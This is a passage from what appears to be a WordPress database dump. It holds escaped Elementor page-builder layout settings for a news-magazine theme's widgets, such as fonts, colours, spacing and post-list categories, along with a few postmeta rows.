unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"3\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1302,459,'_elementor_version','0.4'),(1303,459,'_elementor_css','a:3:{s:4:\"time\";i:1508894332;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1305,460,'_elementor_edit_mode','builder'),(1306,460,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\